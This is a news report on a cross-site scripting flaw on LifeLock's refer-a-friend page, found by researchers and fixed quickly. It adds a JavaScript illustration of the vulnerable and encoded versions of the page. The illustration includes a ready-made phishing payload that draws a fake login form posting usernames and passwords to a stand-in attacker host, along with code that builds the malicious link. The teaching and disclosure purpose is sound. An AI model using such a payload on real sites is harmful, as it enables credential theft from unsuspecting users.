Researchers identified a cross-site scripting (XSS) vulnerability in a page on the LifeLock website that could have allowed an attacker to render an authentic-looking login form under LifeLock's own domain and harvest usernames and passwords from customers.
LifeLock patched the vulnerability quickly after researchers Blake Welsh and Eric Taylor from Cinder Cyber Research reported it. Welsh said via email that the pair stumbled across the vulnerability while browsing the site.
“We were just browsing around LifeLock’s website when we came across a page called ‘refer a friend’ and we noticed one of the URL parameters was producing a colored text, so we decided to see what would happen if we injected HTML into the URL parameter, and it played out as an XSS attack that could be used in phishing campaigns,” Welsh said.
Video demonstration: https://www.youtube.com/watch?v=qtkAecBw1Rs
LifeLock is among the larger identity theft protection companies in the world and says it provides services to more than three million customers. The XSS bug that Welsh and Taylor discovered could have been used in any of a number of different phishing campaigns, either through email lures or redirects from other sites. Because a reflected XSS payload executes on the legitimate site rather than on a look-alike domain, a victim who checked the address bar would have seen LifeLock's real hostname, which is what makes this class of bug more convincing than an ordinary phishing page. The page that the researchers created looked enough like an authentic login screen that it likely would have ensnared some victims.
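To make the mechanism Welsh describes concrete, here is an added example (not LifeLock's code, and not the researchers' proof of concept) of a page that echoes a URL parameter into a styled span without encoding, beside the same page with HTML encoding applied. The parameter name `name`, the hostnames `site.example` and `attacker.example`, and the phishing payload are all constructed for illustration; the payload hides the real page content and draws a fake login form that posts to the attacker's host, which is the kind of phishing use the article describes.

```javascript
// Added example, not code from the LifeLock site: a reflected-XSS pattern in which a URL
// parameter is echoed into the page inside a styled span, beside the hardened version that
// HTML-encodes it. The parameter name "name", the hostnames and the payload are assumptions.

// Minimal HTML entity encoding for text placed between tags or inside a quoted attribute.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Vulnerable: the parameter is concatenated straight into the markup, so any HTML in it
// becomes part of the page and runs in the site's own origin.
function renderReferPageVulnerable(requestUrl) {
  const name = new URL(requestUrl).searchParams.get("name") || "friend";
  return `<html><body>
<h1>Refer a friend</h1>
<p>Hi <span style="color:#c00">${name}</span>, invite someone you know.</p>
</body></html>`;
}

// Hardened: the same page, with the parameter HTML-encoded before insertion.
function renderReferPageFixed(requestUrl) {
  const name = new URL(requestUrl).searchParams.get("name") || "friend";
  return `<html><body>
<h1>Refer a friend</h1>
<p>Hi <span style="color:#c00">${escapeHtml(name)}</span>, invite someone you know.</p>
</body></html>`;
}

// Constructed phishing payload (hypothetical): hides the real page content and draws a
// fake login form posting to an attacker-controlled host. attacker.example is a placeholder.
const PHISH_PAYLOAD =
  '<style>body>*{display:none}</style>' +
  '<form method="post" action="https://attacker.example/collect" style="display:block">' +
  'Username <input name="u"> Password <input name="p" type="password"> ' +
  '<button>Log in</button></form>';

// Checks whether a rendered response carries the injected form as live markup
// (an encoded "&lt;form" does not match, which is the point of the fix).
function containsInjectedForm(html) {
  return /<form[^>]*action="https:\/\/attacker\.example/i.test(html);
}

// Builds the phishing link an attacker would send and renders it through both handlers.
function demo() {
  const url =
    "https://site.example/refer-a-friend?name=" + encodeURIComponent(PHISH_PAYLOAD);
  return {
    link: url,
    vulnerable: containsInjectedForm(renderReferPageVulnerable(url)),
    fixed: containsInjectedForm(renderReferPageFixed(url)),
  };
}

const result = demo();
console.log(`vulnerable page carries the fake form: ${result.vulnerable}`);
console.log(`fixed page carries the fake form:      ${result.fixed}`);
```

Note that the link in `result.link` points at the legitimate host; only the query string is hostile. Output encoding at the point of insertion is the fix; a Content-Security-Policy that blocks inline styles and form submissions to unknown origins (`form-action 'self'`) would be a useful second layer, but it does not replace encoding.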
Welsh said that LifeLock officials took their report quite seriously and got on it immediately.
“The response time of LifeLock was very fast; they fixed the XSS in a matter of minutes and were very cooperative,” he said.